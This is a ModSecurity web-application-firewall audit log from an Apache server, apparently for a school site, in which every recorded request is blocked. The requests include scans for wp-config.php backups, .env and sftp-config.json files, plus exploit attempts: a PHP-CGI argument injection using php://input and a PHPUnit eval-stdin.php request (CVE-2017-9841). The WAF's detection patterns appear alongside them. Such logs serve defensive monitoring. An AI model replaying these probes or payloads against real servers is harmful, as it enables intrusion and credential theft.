Content-Type: text/html; charset=iso-8859-1
--6d3b8171-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785332778 680 (- - -)
Stopwatch2: 1744935785332778 680; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d3b8171-Z--
--6dd38d39-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTgAAAI0 103.236.140.4 52458 103.236.140.4 8181
--6dd38d39-B--
GET /admin/wp-config.phpb HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGLK430 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Safari/537.36
Accept: */*
--6dd38d39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6dd38d39-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785366102 699 (- - -)
Stopwatch2: 1744935785366102 699; combined=286, p1=254, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6dd38d39-Z--
--92a6507c-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTpR4B6O-aqWibPQTwAAAJM 103.236.140.4 52460 103.236.140.4 8181
--92a6507c-B--
GET /admin/wp-config.php-old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321
Accept: */*
--92a6507c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--92a6507c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785398058 669 (- - -)
Stopwatch2: 1744935785398058 669; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--92a6507c-Z--
--5e653201-A--
[18/Apr/2025:07:23:05 +0700] aAGbaRk6uTiIdxrJEES4mwAAAMc 103.236.140.4 52462 103.236.140.4 8181
--5e653201-B--
GET /site/wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept: */*
--5e653201-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e653201-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785429141 800 (- - -)
Stopwatch2: 1744935785429141 800; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e653201-Z--
--2f815176-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhHwAAAEw 103.236.140.4 52464 103.236.140.4 8181
--2f815176-B--
GET /wp/wp-config.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: */*
--2f815176-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2f815176-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785464334 679 (- - -)
Stopwatch2: 1744935785464334 679; combined=256, p1=218, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2f815176-Z--
--5e845b75-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhIAAAAEg 103.236.140.4 52466 103.236.140.4 8181
--5e845b75-B--
GET /wp-config.php~bk HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: */*
--5e845b75-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5e845b75-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785495762 765 (- - -)
Stopwatch2: 1744935785495762 765; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5e845b75-Z--
--02873e21-A--
[18/Apr/2025:07:23:05 +0700] aAGbaTlhhbF_BYhFYTXhIQAAAEo 103.236.140.4 52468 103.236.140.4 8181
--02873e21-B--
GET /wordpress/wp-config.php.new HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Accept: */*
--02873e21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--02873e21-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935785528537 683 (- - -)
Stopwatch2: 1744935785528537 683; combined=263, p1=235, p2=0, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--02873e21-Z--
--f89c302e-A--
[18/Apr/2025:07:23:08 +0700] aAGbbDpR4B6O-aqWibPQVAAAAI8 103.236.140.4 52500 103.236.140.4 8181
--f89c302e-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 178.128.212.64
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.128.212.64
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36
Accept: */*
--f89c302e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f89c302e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744935788559030 694 (- - -)
Stopwatch2: 1744935788559030 694; combined=284, p1=256, p2=0, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f89c302e-Z--
--d7fed778-A--
[18/Apr/2025:10:18:39 +0700] aAHEjxk6uTiIdxrJEEQINAAAAM4 103.236.140.4 38978 103.236.140.4 8181
--d7fed778-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--d7fed778-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d7fed778-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744946319213653 968 (- - -)
Stopwatch2: 1744946319213653 968; combined=466, p1=354, p2=0, p3=0, p4=0, p5=112, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d7fed778-Z--
--5117ef22-A--
[18/Apr/2025:10:33:28 +0700] aAHICBk6uTiIdxrJEEQI4wAAAMk 103.236.140.4 42388 103.236.140.4 8181
--5117ef22-B--
GET /wp-config.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 108.167.133.25
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 108.167.133.25
X-Forwarded-Proto: http
Connection: close
Accept: */*
--5117ef22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5117ef22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744947208446148 1706 (- - -)
Stopwatch2: 1744947208446148 1706; combined=457, p1=414, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5117ef22-Z--
--b2924527-A--
[18/Apr/2025:10:39:10 +0700] aAHJXjlhhbF_BYhFYTUwHAAAAEg 103.236.140.4 43682 103.236.140.4 8181
--b2924527-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--b2924527-C--
--b2924527-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b2924527-E--
--b2924527-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744947550638901 5544 (- - -)
Stopwatch2: 1744947550638901 5544; combined=3981, p1=587, p2=3358, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b2924527-Z--
--ee781d21-A--
[18/Apr/2025:11:05:04 +0700] aAHPcDpR4B6O-aqWibMe0AAAAIY 103.236.140.4 49446 103.236.140.4 8181
--ee781d21-B--
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.2.147.153
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.2.147.153
X-Forwarded-Proto: https
Connection: close
Content-Length: 27
User-Agent: python-requests/2.31.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
--ee781d21-C--
--ee781d21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ee781d21-E--
--ee781d21-H--
Message: Access denied with code 403 (phase 2). String match "" at REQUEST_BODY. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "2718"] [id "244600"] [rev "1"] [msg "COMODO WAF: Arbitrary PHP code execution in PHPUnit before 4.8.28 and 5.x before 5.6.3 (CVE-2017-9841)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744949104033431 6221 (- - -)
Stopwatch2: 1744949104033431 6221; combined=4751, p1=481, p2=4236, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ee781d21-Z--
--b1dcde74-A--
[18/Apr/2025:11:06:41 +0700] aAHP0TlhhbF_BYhFYTUyjgAAAEQ 103.236.140.4 49904 103.236.140.4 8181
--b1dcde74-B--
POST /scripts/WPnBr.dll HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 172.232.159.13
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 172.232.159.13
X-Forwarded-Proto: http
Connection: close
Content-Length: 232
User-Agent: curl/7.54.0
Content-Type: text/xml
--b1dcde74-C--
allall
--b1dcde74-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b1dcde74-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744949201499083 4112 (- - -)
Stopwatch2: 1744949201499083 4112; combined=2405, p1=458, p2=1919, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b1dcde74-Z--
--fb16dc6c-A--
[18/Apr/2025:11:27:31 +0700] aAHUsxk6uTiIdxrJEEQK3wAAANY 103.236.140.4 55072 103.236.140.4 8181
--fb16dc6c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36
Accept-Charset: utf-8
--fb16dc6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb16dc6c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744950451677785 813 (- - -)
Stopwatch2: 1744950451677785 813; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=113, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb16dc6c-Z--
--ec9d3b6c-A--
[18/Apr/2025:12:24:32 +0700] aAHiEFyj-eUTITfvHEWBmgAAABU 103.236.140.4 39600 103.236.140.4 8181
--ec9d3b6c-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 159.89.127.165
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 159.89.127.165
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--ec9d3b6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec9d3b6c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744953872233204 901 (- - -)
Stopwatch2: 1744953872233204 901; combined=335, p1=297, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec9d3b6c-Z--
--374dc27e-A--
[18/Apr/2025:13:13:52 +0700] aAHtoBk6uTiIdxrJEEQQsAAAAMA 103.236.140.4 55806 103.236.140.4 8181
--374dc27e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 209.38.95.9
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 209.38.95.9
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--374dc27e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--374dc27e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744956832213545 742 (- - -)
Stopwatch2: 1744956832213545 742; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--374dc27e-Z--
--da83116b-A--
[18/Apr/2025:13:50:24 +0700] aAH2MDlhhbF_BYhFYTVCrQAAAFQ 103.236.140.4 45590 103.236.140.4 8181
--da83116b-B--
GET /wp-config.php.bk HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 89.43.31.214
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 89.43.31.214
X-Forwarded-Proto: http
Connection: close
Accept: */*
--da83116b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da83116b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959024637982 828 (- - -)
Stopwatch2: 1744959024637982 828; combined=320, p1=277, p2=0, p3=0, p4=0, p5=43, sr=89, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da83116b-Z--
--f57c8f31-A--
[18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXcwAAAMM 103.236.140.4 59584 103.236.140.4 8181
--f57c8f31-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--f57c8f31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f57c8f31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959971063260 793 (- - -)
Stopwatch2: 1744959971063260 793; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f57c8f31-Z--
--69107773-A--
[18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdAAAAMs 103.236.140.4 59586 103.236.140.4 8181
--69107773-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 141.148.156.201
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 141.148.156.201
X-Forwarded-Proto: http
Connection: close
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
accept-language: en-US,en;q=0.5
upgrade-insecure-requests: 1
--69107773-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--69107773-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744959971305947 653 (- - -)
Stopwatch2: 1744959971305947 653; combined=241, p1=212, p2=0, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
